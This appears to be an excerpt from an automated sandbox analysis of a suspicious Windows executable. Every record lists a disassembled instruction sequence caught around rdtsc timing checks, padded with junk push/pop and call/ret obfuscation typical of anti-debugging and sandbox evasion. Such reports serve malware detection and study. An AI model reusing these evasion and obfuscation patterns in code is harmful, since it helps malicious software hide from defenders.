              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 75DB26 second address: 75DB2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 75DB2F second address: 75DB35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 75E437 second address: 75E458 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F9F08C2F7D6h 0x0000000a popad 0x0000000b jne 00007F9F08C2F7E3h 0x00000011 jmp 00007F9F08C2F7DDh 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 75E458 second address: 75E45E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 762236 second address: 762250 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9F08C2F7DEh 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 762250 second address: 762254 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 762254 second address: 76225E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F9F08C2F7D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 76225E second address: 762285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edi 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e jmp 00007F9F08C2E4C3h 0x00000013 pop eax 0x00000014 push ecx 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 762285 second address: 76228A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 76228A second address: 762291 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 769DAE second address: 769DB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 769DB4 second address: 769DE3 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F9F08C2E4B6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f jmp 00007F9F08C2E4C7h 0x00000014 jnp 00007F9F08C2E4B6h 0x0000001a push edi 0x0000001b pop edi 0x0000001c popad 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 72A53B second address: 72A556 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F9F08C2F7E4h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 76924B second address: 76924F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7694E8 second address: 7694EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7699E7 second address: 769A15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2E4C0h 0x00000007 pushad 0x00000008 jmp 00007F9F08C2E4C9h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 769A15 second address: 769A37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F9F08C2F7DCh 0x00000010 pushad 0x00000011 jnl 00007F9F08C2F7D6h 0x00000017 push edi 0x00000018 pop edi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 769A37 second address: 769A48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9F08C2E4BCh 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 769A48 second address: 769A4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 769A4E second address: 769A52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 769A52 second address: 769A68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2F7E2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 769BC2 second address: 769BD2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2E4BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 769BD2 second address: 769C1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F9F08C2F7D6h 0x00000009 push edx 0x0000000a pop edx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 pop eax 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pushad 0x00000019 pushad 0x0000001a jmp 00007F9F08C2F7E6h 0x0000001f push eax 0x00000020 pop eax 0x00000021 jmp 00007F9F08C2F7DDh 0x00000026 jnl 00007F9F08C2F7D6h 0x0000002c popad 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 popad 0x00000031 push ecx 0x00000032 pop ecx 0x00000033 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 76C1DD second address: 76C1FF instructions: 0x00000000 rdtsc 0x00000002 jg 00007F9F08C2E4B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b jmp 00007F9F08C2E4BAh 0x00000010 pop edi 0x00000011 popad 0x00000012 push eax 0x00000013 pushad 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 76C1FF second address: 76C205 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 76C2CC second address: 76C2D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 76C8DF second address: 76C8E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 76C8E3 second address: 76C930 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 je 00007F9F08C2E4C2h 0x0000000e jmp 00007F9F08C2E4BCh 0x00000013 xchg eax, ebx 0x00000014 push 00000000h 0x00000016 push eax 0x00000017 call 00007F9F08C2E4B8h 0x0000001c pop eax 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 add dword ptr [esp+04h], 00000014h 0x00000029 inc eax 0x0000002a push eax 0x0000002b ret 0x0000002c pop eax 0x0000002d ret 0x0000002e mov dword ptr [ebp+12483299h], ebx 0x00000034 mov edi, dword ptr [ebp+122D3C37h] 0x0000003a push eax 0x0000003b pushad 0x0000003c js 00007F9F08C2E4BCh 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 76CA0F second address: 76CA13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 76CA13 second address: 76CA19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 76CF30 second address: 76CF34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 76CF34 second address: 76CF76 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F9F08C2E4BBh 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007F9F08C2E4B8h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 00000019h 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 or edi, dword ptr [ebp+122D2CB6h] 0x0000002e xchg eax, ebx 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 pop edx 0x00000034 pop eax 0x00000035 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 76DD7F second address: 76DD83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 76DB76 second address: 76DB7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 76DD83 second address: 76DD87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 76DB7B second address: 76DB81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 76DD87 second address: 76DD8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 76DD8D second address: 76DDA8 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F9F08C2E4B8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jc 00007F9F08C2E4BCh 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 76DDA8 second address: 76DDAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 76DDAE second address: 76DDB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 76E53D second address: 76E541 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 76F79C second address: 76F7A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 76F7A2 second address: 76F7A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 76F7A6 second address: 76F7AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 770330 second address: 770387 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F9F08C2F7D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c push esi 0x0000000d xor esi, 36593249h 0x00000013 pop esi 0x00000014 push 00000000h 0x00000016 mov dword ptr [ebp+122D2574h], eax 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push ebp 0x00000021 call 00007F9F08C2F7D8h 0x00000026 pop ebp 0x00000027 mov dword ptr [esp+04h], ebp 0x0000002b add dword ptr [esp+04h], 0000001Bh 0x00000033 inc ebp 0x00000034 push ebp 0x00000035 ret 0x00000036 pop ebp 0x00000037 ret 0x00000038 mov esi, dword ptr [ebp+122D1E15h] 0x0000003e xchg eax, ebx 0x0000003f push ebx 0x00000040 jl 00007F9F08C2F7D8h 0x00000046 pushad 0x00000047 popad 0x00000048 pop ebx 0x00000049 push eax 0x0000004a push ebx 0x0000004b pushad 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7700D8 second address: 7700DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7718A9 second address: 7718C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2F7E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 771662 second address: 771688 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F9F08C2E4BAh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F9F08C2E4C1h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 775181 second address: 77518A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 77518A second address: 775226 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ebp 0x0000000c call 00007F9F08C2E4B8h 0x00000011 pop ebp 0x00000012 mov dword ptr [esp+04h], ebp 0x00000016 add dword ptr [esp+04h], 0000001Ah 0x0000001e inc ebp 0x0000001f push ebp 0x00000020 ret 0x00000021 pop ebp 0x00000022 ret 0x00000023 mov bx, 916Fh 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push esi 0x0000002c call 00007F9F08C2E4B8h 0x00000031 pop esi 0x00000032 mov dword ptr [esp+04h], esi 0x00000036 add dword ptr [esp+04h], 00000016h 0x0000003e inc esi 0x0000003f push esi 0x00000040 ret 0x00000041 pop esi 0x00000042 ret 0x00000043 call 00007F9F08C2E4C7h 0x00000048 or dword ptr [ebp+122D3B71h], ecx 0x0000004e pop ebx 0x0000004f clc 0x00000050 je 00007F9F08C2E4BCh 0x00000056 mov edi, dword ptr [ebp+122D2DD6h] 0x0000005c push 00000000h 0x0000005e push esi 0x0000005f mov dword ptr [ebp+122D1E61h], edi 0x00000065 pop edi 0x00000066 xchg eax, esi 0x00000067 jmp 00007F9F08C2E4BDh 0x0000006c push eax 0x0000006d pushad 0x0000006e push eax 0x0000006f push edx 0x00000070 jo 00007F9F08C2E4B6h 0x00000076 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 77539E second address: 7753A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7753A4 second address: 7753A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7753A9 second address: 7753AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7771CB second address: 7771CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7753AF second address: 7753B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7753B3 second address: 775450 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jnl 00007F9F08C2E4B8h 0x00000010 push edi 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 pop edi 0x00000014 popad 0x00000015 nop 0x00000016 push dword ptr fs:[00000000h] 0x0000001d mov ebx, dword ptr [ebp+122D3C62h] 0x00000023 mov dword ptr fs:[00000000h], esp 0x0000002a movsx ebx, di 0x0000002d sub dword ptr [ebp+122D30EAh], ecx 0x00000033 mov eax, dword ptr [ebp+122D12F5h] 0x00000039 push 00000000h 0x0000003b push ebp 0x0000003c call 00007F9F08C2E4B8h 0x00000041 pop ebp 0x00000042 mov dword ptr [esp+04h], ebp 0x00000046 add dword ptr [esp+04h], 00000018h 0x0000004e inc ebp 0x0000004f push ebp 0x00000050 ret 0x00000051 pop ebp 0x00000052 ret 0x00000053 call 00007F9F08C2E4C3h 0x00000058 call 00007F9F08C2E4C0h 0x0000005d mov bx, 0036h 0x00000061 pop ebx 0x00000062 pop edi 0x00000063 sbb ebx, 56CD338Fh 0x00000069 push FFFFFFFFh 0x0000006b sub dword ptr [ebp+122D299Ch], edi 0x00000071 push eax 0x00000072 jc 00007F9F08C2E4C0h 0x00000078 push eax 0x00000079 push edx 0x0000007a push eax 0x0000007b pop eax 0x0000007c rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 777368 second address: 77736C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 77736C second address: 777372 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 777372 second address: 777376 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 778394 second address: 778399 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 77742F second address: 777434 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 77A021 second address: 77A025 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 77A025 second address: 77A02B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 77A02B second address: 77A031 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 77A031 second address: 77A035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 77929D second address: 7792A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 77C012 second address: 77C09C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push edi 0x0000000a call 00007F9F08C2F7D8h 0x0000000f pop edi 0x00000010 mov dword ptr [esp+04h], edi 0x00000014 add dword ptr [esp+04h], 0000001Ch 0x0000001c inc edi 0x0000001d push edi 0x0000001e ret 0x0000001f pop edi 0x00000020 ret 0x00000021 push 00000000h 0x00000023 push 00000000h 0x00000025 push ebp 0x00000026 call 00007F9F08C2F7D8h 0x0000002b pop ebp 0x0000002c mov dword ptr [esp+04h], ebp 0x00000030 add dword ptr [esp+04h], 0000001Ch 0x00000038 inc ebp 0x00000039 push ebp 0x0000003a ret 0x0000003b pop ebp 0x0000003c ret 0x0000003d pushad 0x0000003e mov dx, 8684h 0x00000042 mov bl, A6h 0x00000044 popad 0x00000045 push 00000000h 0x00000047 or ebx, dword ptr [ebp+1245FA5Dh] 0x0000004d xchg eax, esi 0x0000004e pushad 0x0000004f jnp 00007F9F08C2F7D8h 0x00000055 pushad 0x00000056 popad 0x00000057 jmp 00007F9F08C2F7DFh 0x0000005c popad 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 jp 00007F9F08C2F7DCh 0x00000066 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 77CFAA second address: 77CFB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 77CFB1 second address: 77D033 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F9F08C2F7DAh 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e mov bh, 5Dh 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push eax 0x00000015 call 00007F9F08C2F7D8h 0x0000001a pop eax 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f add dword ptr [esp+04h], 0000001Dh 0x00000027 inc eax 0x00000028 push eax 0x00000029 ret 0x0000002a pop eax 0x0000002b ret 0x0000002c sub dword ptr [ebp+122D1FEDh], esi 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push edi 0x00000037 call 00007F9F08C2F7D8h 0x0000003c pop edi 0x0000003d mov dword ptr [esp+04h], edi 0x00000041 add dword ptr [esp+04h], 00000014h 0x00000049 inc edi 0x0000004a push edi 0x0000004b ret 0x0000004c pop edi 0x0000004d ret 0x0000004e xchg eax, esi 0x0000004f jmp 00007F9F08C2F7DEh 0x00000054 push eax 0x00000055 push eax 0x00000056 push edx 0x00000057 jnp 00007F9F08C2F7E0h 0x0000005d rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 77C209 second address: 77C20D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 77C20D second address: 77C217 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F9F08C2F7D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 77C217 second address: 77C21D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 77C21D second address: 77C237 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jnc 00007F9F08C2F7DCh 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 77C237 second address: 77C23B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 77F136 second address: 77F14F instructions: 0x00000000 rdtsc 0x00000002 js 00007F9F08C2F7D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F9F08C2F7DBh 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 77F3CE second address: 77F3D3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 78122A second address: 781230 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 782242 second address: 78225D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jns 00007F9F08C2E4B6h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F9F08C2E4BBh 0x00000015 rdtsc
